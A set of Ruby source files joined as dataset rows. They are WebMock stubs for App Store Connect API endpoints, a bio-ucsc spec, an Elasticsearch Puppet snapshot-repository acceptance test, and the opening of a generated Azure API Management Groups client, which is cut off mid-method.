to_return(status: 200, body: itc_read_fixture_file('app_resolution_center_valid.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center_valid.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_invalid_update
# Called from the specs to simulate invalid server responses
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/812106519").
to_return(status: 200, body: itc_read_fixture_file('update_app_version_failed.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_valid_update
# Called from the specs to simulate valid server responses
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/812106519").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_valid_version_update_with_autorelease_and_release_on_datetime
# Called from the specs to simulate valid server responses
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/812106519").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_with_autorelease_overwrite_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_app_version_ref
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/version/ref").
to_return(status: 200, body: itc_read_fixture_file("app_version_ref.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_user_detail
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/user/detail").
to_return(status: 200, body: itc_read_fixture_file("user_detail.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_sandbox_testers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/iap").
to_return(status: 200, body: itc_read_fixture_file("sandbox_testers.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_create_sandbox_tester
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/iap/add").
with(body: JSON.parse(itc_read_fixture_file("create_sandbox_tester_payload.json"))).
to_return(status: 200, body: itc_read_fixture_file("create_sandbox_tester.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_delete_sandbox_tester
body = JSON.parse(itc_read_fixture_file("delete_sandbox_tester_payload.json"))
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/iap/delete").
with(body: body.to_json).
to_return(status: 200, body: itc_read_fixture_file("delete_sandbox_tester.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_pricing_tiers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/pricing/matrix").
to_return(status: 200, body: itc_read_fixture_file("pricing_tiers.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_release_to_store
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/releaseToStore").
with(body: "898536088").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_release_to_all_users
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/phasedRelease/state/COMPLETE").
with(body: "898536088").
to_return(status: 200, body: itc_read_fixture_file("update_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_promocodes
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/promocodes/versions").
to_return(status: 200, body: itc_read_fixture_file("promocodes.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_generate_promocodes
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/promocodes/versions").
to_return(status: 200, body: itc_read_fixture_file("promocodes_generated.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_promocodes_history
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/promocodes/history").
to_return(status: 200, body: itc_read_fixture_file("promocodes_history.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_iap
# pricing goal calculator
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137656/pricing/equalize/EUR/1").
to_return(status: 200, body: itc_read_fixture_file("iap_price_goal_calc.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657/pricing/equalize/EUR/1").
to_return(status: 200, body: itc_read_fixture_file("iap_price_goal_calc.json"),
headers: { "Content-Type" => "application/json" })
# get shared secret
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/appSharedSecret").
to_return(status: 200, body: itc_read_fixture_file("iap_shared_secret_1.json"),
headers: { "Content-Type" => "application/json" })
# generate new shared secret
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/appSharedSecret").
to_return(status: 200, body: itc_read_fixture_file("iap_shared_secret_2.json"),
headers: { "Content-Type" => "application/json" })
# delete iap
stub_request(:delete, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1194457865").
to_return(status: 200, body: "", headers: {})
# create consumable iap
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
with(body: itc_read_fixture_file("iap_create.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_detail.json"),
headers: { "Content-Type" => "application/json" })
# create recurring iap
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
with(body: itc_read_fixture_file("iap_create_recurring.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# create recurring iap without pricing
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
with(body: itc_read_fixture_file("iap_create_recurring_without_pricing.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# iap consumable template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/consumable/template").
to_return(status: 200, body: itc_read_fixture_file("iap_consumable_template.json"),
headers: { "Content-Type" => "application/json" })
# iap recurring template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/recurring/template").
to_return(status: 200, body: itc_read_fixture_file("iap_recurring_template.json"),
headers: { "Content-Type" => "application/json" })
# iap edit family (iap_family_edit_versions.json payload)
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20373395/").
with(body: itc_read_fixture_file("iap_family_edit_versions.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap edit family (iap_family_edit.json payload)
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20373395/").
with(body: itc_read_fixture_file("iap_family_edit.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap edit family (iap_family_edit_with_de.json payload)
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20373395/").
with(body: itc_read_fixture_file("iap_family_edit_with_de.json")).
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap family detail
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/20372345").
to_return(status: 200, body: itc_read_fixture_file("iap_family_detail.json"),
headers: { "Content-Type" => "application/json" })
# create IAP family
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/").
with(body: JSON.parse(itc_read_fixture_file("iap_family_create.json"))).
to_return(status: 200, body: itc_read_fixture_file("iap_family_create_success.json"), headers: { "Content-Type" => "application/json" })
# load IAP Family Template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/family/template").
to_return(status: 200, body: itc_read_fixture_file("iap_family_template.json"),
headers: { "Content-Type" => "application/json" })
# update IAP
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137656").
with(body: JSON.parse(itc_read_fixture_file("iap_update.json"))).
to_return(status: 200, body: itc_read_fixture_file("iap_detail.json"),
headers: { "Content-Type" => "application/json" })
# update IAP recurring
stub_request(:put, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657").
with(body: JSON.parse(itc_read_fixture_file("iap_update_recurring.json"))).
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# iap details
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1194457865").
to_return(status: 200, body: itc_read_fixture_file("iap_detail.json"),
headers: { "Content-Type" => "application/json" })
# iap details recurring
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657").
to_return(status: 200, body: itc_read_fixture_file("iap_detail_recurring.json"),
headers: { "Content-Type" => "application/json" })
# list families
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/families").
to_return(status: 200, body: itc_read_fixture_file("iap_families.json"),
headers: { "Content-Type" => "application/json" })
# list iaps
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps").
to_return(status: 200, body: itc_read_fixture_file("iap_list.json"),
headers: { "Content-Type" => "application/json" })
# subscription pricing tiers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/pricing/matrix/recurring").
to_return(status: 200, body: itc_read_fixture_file("iap_pricing_tiers.json"),
headers: { "Content-Type" => "application/json" })
# iap recurring product pricing
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/iaps/1195137657/pricing").
to_return(status: 200, body: itc_read_fixture_file("iap_pricing_recurring.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_reject_version_success
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/reject").
to_return(status: 200, body: itc_read_fixture_file("reject_app_version_success.json"),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_supported_countries
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/pricing/supportedCountries").
to_return(status: 200, body: itc_read_fixture_file(File.join('supported_countries.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_pricing_intervals
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_add_territory
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'add_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'add_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_remove_territory
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'remove_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'remove_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_uninclude_future_territories
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'uninclude_all_future_territories_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'uninclude_all_future_territories_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_update_price_tier
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('update_price_tier', 'update_price_tier_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_set_preorder_cleared
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_set_preorder_cleared_with_date
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
with(body: JSON.parse(itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_with_date_request.json'))).to_json).
to_return(status: 200, body: itc_read_fixture_file(File.join('availability', 'set_preorder_cleared_with_date_response.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_pricing_intervals_vpp
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals_b2b_included.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_pricing_intervals_b2b_disabled
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/pricing/intervals").
to_return(status: 200, body: itc_read_fixture_file(File.join('app_pricing_intervals_b2b_flag_disabled.json')),
headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_members
# resend notification
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/[email protected]/resendInvitation").
to_return(status: 200, body: "", headers: {})
# create member default (admin, all-apps)
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
with(body: JSON.parse(itc_read_fixture_file("member_create.json"))).
to_return(status: 200, body: "", headers: {})
# create member role: developer, apps: all
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
with(body: JSON.parse(itc_read_fixture_file("member_create_developer.json"))).
to_return(status: 200, body: "", headers: {})
# create member role: appmanager, apps: 12345
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
with(body: JSON.parse(itc_read_fixture_file("member_create_appmanager_single_app.json"))).
to_return(status: 200, body: "", headers: {})
# member template
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/create").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_template.json')),
headers: { "Content-Type" => "application/json" })
# read member roles default (admin, all-apps)
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/283226505/roles").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_read_roles.json')),
headers: { "Content-Type" => "application/json" })
# update member default (admin, all-apps)
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/283226505/roles").
with(body: JSON.parse(itc_read_fixture_file("member_update_roles.json"))).
to_return(status: 200, body: "", headers: {})
# read member roles before role: developer, apps: all
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10795390202/roles").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_read_roles_before_developer.json')),
headers: { "Content-Type" => "application/json" })
# update member role: developer, apps: all
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10795390202/roles").
with(body: JSON.parse(itc_read_fixture_file("member_update_roles_developer.json"))).
to_return(status: 200, body: "", headers: {})
# read member roles before role: appmanager, apps: 12345
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10791511390202/roles").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_read_roles_before_appmanager_single_app.json')),
headers: { "Content-Type" => "application/json" })
# update member role: appmanager, apps: 12345
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc/10791511390202/roles").
with(body: JSON.parse(itc_read_fixture_file("member_update_roles_appmanager_single_app.json"))).
to_return(status: 200, body: "", headers: {})
# Load member list
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/itc").
to_return(status: 200, body: itc_read_fixture_file(File.join('member_list.json')),
headers: { "Content-Type" => "application/json" })
end
def itc_stub_analytics(start_time, end_time)
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["units"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_units.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["pageViewCount"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_views.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["iap"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_in_app_purchases.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["sales"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_sales.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["payingUsers"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_paying_users.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["installs"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_installs.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["sessions"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_sessions.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["activeDevices"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_active_devices.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => nil, "measures" => ["crashes"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_crashes.json"),
headers: { "Content-Type" => "application/json" })
stub_request(:post, "https://appstoreconnect.apple.com/analytics/api/v1/data/time-series").
with(body: { "adamId" => ["898536088"], "dimensionFilters" => [], "endTime" => end_time, "frequency" => "DAY", "group" => { metric: "installs", dimension: "source", rank: "DESCENDING", limit: 3 }, "measures" => ["installs"], "startTime" => start_time }.to_json).
to_return(status: 200, body: itc_read_fixture_file("app_analytics_installs_by_source.json"),
headers: { "Content-Type" => "application/json" })
end
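# Editorial usage sketch (not part of the original helpers): unlike the other stubs,
# itc_stub_analytics is parameterised on the reporting window, and WebMock matches the
# serialised JSON body verbatim, so a spec must pass exactly the start/end values the
# code under test will send. The timestamp format below is an assumption:
#
#   before { itc_stub_analytics('2019-01-01T00:00:00Z', '2019-01-08T00:00:00Z') }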
def itc_stub_no_live_version
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview_stuckinprepare.json'), headers: { 'Content-Type' => 'application/json' })
end
end
end
| 67.867868 | 270 | 0.701814 |
abbf4fc5d0cd08479a3e7840d9cde2ffcbaf9cc9 | 480 | require 'bio-ucsc'
describe "Bio::Ucsc::Hg18::DelHinds2" do
describe "#find_by_interval" do
context "given range chr1:1-20,000,000" do
it "returns an array of results with column accessors" do
Bio::Ucsc::Hg18::DBConnection.default
Bio::Ucsc::Hg18::DBConnection.connect
i = Bio::GenomicInterval.parse("chr1:1-20,000,000")
r = Bio::Ucsc::Hg18::DelHinds2.find_by_interval(i)
r.chrom.should == "chr1"
end
end
end
end
| 28.235294 | 63 | 0.647917 |
abd329f8e915f792a3fa8e7e02f198f3b18574dc | 2,433 | require 'json'
require 'helpers/acceptance/tests/manifest_shared_examples'
# Main entrypoint for snapshot tests
shared_examples 'snapshot repository acceptance tests' do
describe 'elasticsearch::snapshot_repository', :with_cleanup do
es_config = {
'http.port' => 9200,
'node.name' => 'elasticsearchSnapshot01',
'path.repo' => '/var/lib/elasticsearch'
}
# Override the manifest in order to populate 'path.repo'
let(:manifest) do
package = if !v[:is_snapshot]
<<-MANIFEST
# Hard version set here due to plugin incompatibilities.
version => '#{v[:elasticsearch_full_version]}',
MANIFEST
else
<<-MANIFEST
manage_repo => false,
package_url => '#{v[:snapshot_package]}',
MANIFEST
end
<<-MANIFEST
api_timeout => 60,
config => {
'cluster.name' => '#{v[:cluster_name]}',
'http.bind_host' => '0.0.0.0',
#{es_config.map { |k, v| " '#{k}' => '#{v}'," }.join("\n")}
},
jvm_options => [
'-Xms128m',
'-Xmx128m',
],
oss => #{v[:oss]},
#{package}
MANIFEST
end
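# Editorial note: with the release-package branch taken, the fragment above is expected
# to render roughly as follows (cluster name, oss flag and version come from `v` and are
# illustrative here); the shared examples presumably wrap it in a
# `class { 'elasticsearch': ... }` declaration:
#
#   api_timeout => 60,
#   config => {
#     'cluster.name' => 'es-acceptance',
#     'http.bind_host' => '0.0.0.0',
#     'http.port' => '9200',
#     'node.name' => 'elasticsearchSnapshot01',
#     'path.repo' => '/var/lib/elasticsearch',
#   },
#   jvm_options => [
#     '-Xms128m',
#     '-Xmx128m',
#   ],
#   oss => false,
#   version => '6.8.3',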
let(:manifest_class_parameters) { 'restart_on_change => true' }
let(:extra_manifest) do
<<-MANIFEST
elasticsearch::snapshot_repository { 'backup':
ensure => 'present',
api_timeout => 60,
location => '/var/lib/elasticsearch/backup',
max_restore_rate => '20mb',
max_snapshot_rate => '80mb',
}
MANIFEST
end
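# Editorial note: the resource above corresponds to registering a filesystem ('fs')
# snapshot repository via the Elasticsearch API, roughly:
#
#   PUT /_snapshot/backup
#   {
#     "type": "fs",
#     "settings": {
#       "location": "/var/lib/elasticsearch/backup",
#       "max_restore_rate": "20mb",
#       "max_snapshot_rate": "80mb"
#     }
#   }
#
# Setting names follow the assertion further down; the provider may translate them to
# the underlying Elasticsearch setting names.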
include_examples('manifest application', es_config)
es_port = es_config['http.port']
describe port(es_port) do
it 'open', :with_retries do
should be_listening
end
end
describe server :container do
describe http(
"http://localhost:#{es_port}/_snapshot/backup"
) do
it 'returns the snapshot repository', :with_retries do
expect(JSON.parse(response.body)['backup'])
.to include('settings' => a_hash_including(
'location' => '/var/lib/elasticsearch/backup',
'max_restore_rate' => '20mb',
'max_snapshot_rate' => '80mb'
))
end
end
end
end
end
| 29.670732 | 76 | 0.530621 |
187786e04bc30f3de65df11df219acf52e6eff4b | 39,299 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2016_10_10
#
# ApiManagement Client
#
class Groups
include MsRestAzure
#
# Creates and initializes a new instance of the Groups class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [ApiManagementClient] reference to the ApiManagementClient
attr_reader :client
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field       | Supported operators    | Supported functions                         |
# |-------------|------------------------|---------------------------------------------|
# | id          | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | name        | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | type        | eq, ne                 | N/A                                         |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<GroupContract>] operation results.
#
def list_by_service(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
first_page = list_by_service_as_lazy(resource_group_name, service_name, filter:filter, top:top, skip:skip, custom_headers:custom_headers)
first_page.get_all_items
end
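# Usage sketch (editorial addition; the resource names and the OData filter string are
# illustrative, not taken from this file):
#
#   groups = Groups.new(client)   # `client` is a configured ApiManagementClient
#   first_groups = groups.list_by_service('my-resource-group', 'my-apim-service',
#                                         filter: "startswith(name,'dev')",
#                                         top: 10)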
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field       | Supported operators    | Supported functions                         |
# |-------------|------------------------|---------------------------------------------|
# | id          | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | name        | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | type        | eq, ne                 | N/A                                         |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_service_with_http_info(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
list_by_service_async(resource_group_name, service_name, filter:filter, top:top, skip:skip, custom_headers:custom_headers).value!
end
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field       | Supported operators    | Supported functions                         |
# |-------------|------------------------|---------------------------------------------|
# | id          | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | name        | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |
# | type        | eq, ne                 | N/A                                         |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_service_async(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, "'top' should satisfy the constraint - 'InclusiveMinimum': '1'" if !top.nil? && top < 1
fail ArgumentError, "'skip' should satisfy the constraint - 'InclusiveMinimum': '0'" if !skip.nil? && skip < 0
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
